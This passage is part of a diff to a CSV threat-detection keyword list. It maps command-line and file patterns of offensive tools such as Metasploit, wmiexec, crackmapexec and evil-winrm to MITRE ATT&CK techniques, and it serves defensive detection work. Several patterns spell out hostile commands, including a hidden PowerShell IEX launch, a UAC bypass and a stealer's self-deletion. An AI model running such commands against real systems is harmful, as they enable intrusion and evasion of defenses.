TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*cloudFilterEOP.exe*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*cloudmapper collect --account parent --profile parent*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*cloudmapper configure add-account --config-file config.json --name parent --id XXX --default true*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*cloudmapper configure discover-organization-accounts*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" @@ -8497,88 +8645,88 @@ "*cloudsplaining scan --input-file default.json*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*cloudsplaining scan-multi-account -c accounts.yml -r TargetRole --output-directory ./*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*cloudsplaining scan-policy-file --input-file examples/policies/wildcards.json*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*cloudsploit *","offensive_tool_keyword","cloudsploit","CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts including: Amazon Web Services (AWS) - Microsoft Azure - Google Cloud Platform (GCP) - Oracle Cloud Infrastructure (OCI) and GitHub. These scripts are designed to return a series of potential misconfigurations and security risks.","T1526 - T1534 - T1547 - T1078 - T1046","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/aquasecurity/cloudsploit","1","0","N/A","N/A","10","2921","641","2023-09-29T16:35:48Z","2015-06-29T15:33:40Z" -"*cloudsploit*cloudtrail*","offensive_tool_keyword","cloudsploit","CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts including: Amazon Web Services (AWS) - Microsoft Azure - Google Cloud Platform (GCP) - Oracle Cloud Infrastructure (OCI) and GitHub. These scripts are designed to return a series of potential misconfigurations and security risks.","T1526 - T1534 - T1547 - T1078 - T1046","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/aquasecurity/cloudsploit","1","1","N/A","N/A","10","2921","641","2023-09-29T16:35:48Z","2015-06-29T15:33:40Z" -"*cloudsploit/index.js*","offensive_tool_keyword","cloudsploit","CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts including: Amazon Web Services (AWS) - Microsoft Azure - Google Cloud Platform (GCP) - Oracle Cloud Infrastructure (OCI) and GitHub. These scripts are designed to return a series of potential misconfigurations and security risks.","T1526 - T1534 - T1547 - T1078 - T1046","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/aquasecurity/cloudsploit","1","1","N/A","N/A","10","2921","641","2023-09-29T16:35:48Z","2015-06-29T15:33:40Z" -"*cloudsploit/scans*","offensive_tool_keyword","cloudsploit","CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts including: Amazon Web Services (AWS) - Microsoft Azure - Google Cloud Platform (GCP) - Oracle Cloud Infrastructure (OCI) and GitHub. These scripts are designed to return a series of potential misconfigurations and security risks.","T1526 - T1534 - T1547 - T1078 - T1046","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/aquasecurity/cloudsploit","1","1","N/A","N/A","10","2921","641","2023-09-29T16:35:48Z","2015-06-29T15:33:40Z" -"*CloudSploitSupplemental*","offensive_tool_keyword","cloudsploit","CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts including: Amazon Web Services (AWS) - Microsoft Azure - Google Cloud Platform (GCP) - Oracle Cloud Infrastructure (OCI) and GitHub. These scripts are designed to return a series of potential misconfigurations and security risks.","T1526 - T1534 - T1547 - T1078 - T1046","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/aquasecurity/cloudsploit","1","1","N/A","N/A","10","2921","641","2023-09-29T16:35:48Z","2015-06-29T15:33:40Z" -"*cloudtrail__csv_injection*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*cloudsploit *","offensive_tool_keyword","cloudsploit","CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts including: Amazon Web Services (AWS) - Microsoft Azure - Google Cloud Platform (GCP) - Oracle Cloud Infrastructure (OCI) and GitHub. These scripts are designed to return a series of potential misconfigurations and security risks.","T1526 - T1534 - T1547 - T1078 - T1046","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/aquasecurity/cloudsploit","1","0","N/A","N/A","10","2922","641","2023-09-29T16:35:48Z","2015-06-29T15:33:40Z" +"*cloudsploit*cloudtrail*","offensive_tool_keyword","cloudsploit","CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts including: Amazon Web Services (AWS) - Microsoft Azure - Google Cloud Platform (GCP) - Oracle Cloud Infrastructure (OCI) and GitHub. These scripts are designed to return a series of potential misconfigurations and security risks.","T1526 - T1534 - T1547 - T1078 - T1046","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/aquasecurity/cloudsploit","1","1","N/A","N/A","10","2922","641","2023-09-29T16:35:48Z","2015-06-29T15:33:40Z" +"*cloudsploit/index.js*","offensive_tool_keyword","cloudsploit","CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts including: Amazon Web Services (AWS) - Microsoft Azure - Google Cloud Platform (GCP) - Oracle Cloud Infrastructure (OCI) and GitHub. These scripts are designed to return a series of potential misconfigurations and security risks.","T1526 - T1534 - T1547 - T1078 - T1046","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/aquasecurity/cloudsploit","1","1","N/A","N/A","10","2922","641","2023-09-29T16:35:48Z","2015-06-29T15:33:40Z" +"*cloudsploit/scans*","offensive_tool_keyword","cloudsploit","CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts including: Amazon Web Services (AWS) - Microsoft Azure - Google Cloud Platform (GCP) - Oracle Cloud Infrastructure (OCI) and GitHub. These scripts are designed to return a series of potential misconfigurations and security risks.","T1526 - T1534 - T1547 - T1078 - T1046","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/aquasecurity/cloudsploit","1","1","N/A","N/A","10","2922","641","2023-09-29T16:35:48Z","2015-06-29T15:33:40Z" +"*CloudSploitSupplemental*","offensive_tool_keyword","cloudsploit","CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts including: Amazon Web Services (AWS) - Microsoft Azure - Google Cloud Platform (GCP) - Oracle Cloud Infrastructure (OCI) and GitHub. These scripts are designed to return a series of potential misconfigurations and security risks.","T1526 - T1534 - T1547 - T1078 - T1046","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/aquasecurity/cloudsploit","1","1","N/A","N/A","10","2922","641","2023-09-29T16:35:48Z","2015-06-29T15:33:40Z" +"*cloudtrail__csv_injection*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" "*clr2of8/GatherContacts*","offensive_tool_keyword","GatherContacts","A Burp Suite Extension to pull Employee Names from Google and Bing LinkedIn Search Results.As part of reconnaissance when performing a penetration test. it is often useful to gather employee names that can then be massaged into email addresses and usernames. The usernames may come in handy for performing a password spraying attack for example. One easy way to gather employee names is to use the following Burp Suite Pro extension as described below.","T1593 - T1533 - T1087","TA0043 - TA0002","N/A","N/A","Information Gathering","https://github.com/clr2of8/GatherContacts","1","1","N/A","N/A","2","169","44","2022-08-27T13:28:08Z","2018-03-29T14:46:14Z" -"*cmbndhnoonmghfofefkcccljbkdpamhi_14678.crx*","offensive_tool_keyword","hack-tools","The all-in-one Red Team browser extension for Web Pentester","T1059.007 - T1505 - T1068 - T1216 - T1547.009","TA0002 - TA0001 - TA0009","N/A","N/A","Web Attacks","https://github.com/LasCC/Hack-Tools","1","1","N/A","9","10","5006","586","2023-10-03T15:40:37Z","2020-06-22T21:42:16Z" +"*cmbndhnoonmghfofefkcccljbkdpamhi_14678.crx*","offensive_tool_keyword","hack-tools","The all-in-one Red Team browser extension for Web Pentester","T1059.007 - T1505 - T1068 - T1216 - T1547.009","TA0002 - TA0001 - TA0009","N/A","N/A","Web Attacks","https://github.com/LasCC/Hack-Tools","1","1","N/A","9","10","5007","586","2023-10-03T15:40:37Z","2020-06-22T21:42:16Z" "*cmd /c * --bypass-uac*","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs/","1","0","N/A","6","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" "*cmd /c * --remote-impersonation*","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs/","1","0","N/A","6","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" -"*cmd /c *if exist *.txt echo ImHere*","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","0","N/A","10","10","1554","344","2023-09-14T20:51:52Z","2015-03-16T13:15:00Z" -"*cmd /c mklink /d * HarddiskVolumeShadowCopy1*","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021 - T1028 - T1046 - T1078 - T1091 - T1219","TA0003 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","10","10","3760","566","2023-06-09T07:42:42Z","2019-05-28T10:53:00Z" +"*cmd /c *if exist *.txt echo ImHere*","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","0","N/A","10","10","1555","344","2023-09-14T20:51:52Z","2015-03-16T13:15:00Z" +"*cmd /c mklink /d * HarddiskVolumeShadowCopy1*","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021 - T1028 - T1046 - T1078 - T1091 - T1219","TA0003 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","10","10","3763","566","2023-06-09T07:42:42Z","2019-05-28T10:53:00Z" "*cmd /c whoami* bypass*","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BeichenDream/SharpToken","1","0","N/A","N/A","4","353","47","2023-04-11T13:29:23Z","2022-06-30T07:34:57Z" -"*cmd smb *-u*-p*","offensive_tool_keyword","crackmapexec","crackmapexec command lines. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*cmd smb *-u*-p*","offensive_tool_keyword","crackmapexec","crackmapexec command lines. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "*cmd.exe /c *echo test > C:\Users\Public\test.txt*","offensive_tool_keyword","NimExec","Fileless Command Execution for Lateral Movement in Nim","T1021.006 - T1059.005 - T1564.001","TA0008 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/frkngksl/NimExec","1","0","N/A","N/A","4","307","33","2023-06-23T11:07:20Z","2023-04-21T19:46:53Z" "*cmd.exe /c rundll32.exe agressor.dll*stealth*","offensive_tool_keyword","mortar","red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. Mortar is able to bypass modern anti-virus products and advanced XDR solutions","T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562","TA0002 - TA0003 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","0","N/A","N/A","10","1181","193","2022-08-03T03:38:57Z","2021-11-25T16:49:47Z" -"*cmd.exe /c sc start plumber*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","3","271","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*cmd.exe /c sc start plumber*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" "*cmd.exe /c timeout /t 5 & del /f /q *%s* & exit*","offensive_tool_keyword","mars stealer","Self-removal 'mars stealer' command","T1587","TA0002","mars stealer","","Malware","https://3xp0rt.com/posts/mars-stealer","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*cmd.exe /c zoom1.msi*","offensive_tool_keyword","Zloader","Zloader Installs Remote Access Backdoors and Delivers Cobalt Strike","T1059 - T1220 - T1566.001 - T1059.005 - T1218.011 - T1562.001 - T1204","TA0002 - TA0008 - TA0006 - TA0001 - TA0010 - TA0003","N/A","N/A","Exploitation tools","https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*cmd.exe /Q /c *.bat *> \\127.0.0.1\ADMIN$\* 2&*","offensive_tool_keyword","wmiexec","wmiexec.py from impacket used by metasploit","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127","1","0","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*cmd.exe /Q /c /start /min powershell.exe -nop -c*","offensive_tool_keyword","wmiexec","wmiexec.py from impacket used by metasploit","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127","1","0","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*cmd.exe /Q /c hostname1> *\\127.0.0.1\ADMIN$\* 2>*","offensive_tool_keyword","wmiexec","wmiexec.py from impacket used by metasploit","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127","1","0","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*cmd.exe /Q /c nslookup 1> *\\127.0.0.1\ADMIN$\* 2>*","offensive_tool_keyword","wmiexec","wmiexec.py from impacket used by metasploit","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127","1","0","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*cmd.exe /Q /c powershell.exe -nop -w -hidden -c*IEX*","offensive_tool_keyword","wmiexec","wmiexec.py from impacket used by metasploit","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127","1","0","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*cmd.exe /Q /c powershelll.exe 1> *\\127.0.0.1\ADMIN$\* 2>*","offensive_tool_keyword","wmiexec","wmiexec.py from impacket used by metasploit","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127","1","0","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*cmd.exe /Q /c quser 1 > \\127.0.0.1\ADMIN$\*","offensive_tool_keyword","wmiexec","wmiexec.py from impacket used by metasploit","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127","1","0","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*cmd.exe /Q /c *.bat *> \\127.0.0.1\ADMIN$\* 2&*","offensive_tool_keyword","wmiexec","wmiexec.py from impacket used by metasploit","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*cmd.exe /Q /c /start /min powershell.exe -nop -c*","offensive_tool_keyword","wmiexec","wmiexec.py from impacket used by metasploit","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*cmd.exe /Q /c hostname1> *\\127.0.0.1\ADMIN$\* 2>*","offensive_tool_keyword","wmiexec","wmiexec.py from impacket used by metasploit","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*cmd.exe /Q /c nslookup 1> *\\127.0.0.1\ADMIN$\* 2>*","offensive_tool_keyword","wmiexec","wmiexec.py from impacket used by metasploit","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*cmd.exe /Q /c powershell.exe -nop -w -hidden -c*IEX*","offensive_tool_keyword","wmiexec","wmiexec.py from impacket used by metasploit","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*cmd.exe /Q /c powershelll.exe 1> *\\127.0.0.1\ADMIN$\* 2>*","offensive_tool_keyword","wmiexec","wmiexec.py from impacket used by metasploit","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*cmd.exe /Q /c quser 1 > \\127.0.0.1\ADMIN$\*","offensive_tool_keyword","wmiexec","wmiexec.py from impacket used by metasploit","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*cmd.exe /Q /c start *stage1.exe 1*","offensive_tool_keyword","malware","Destructive Malware targeting organizations","T1486 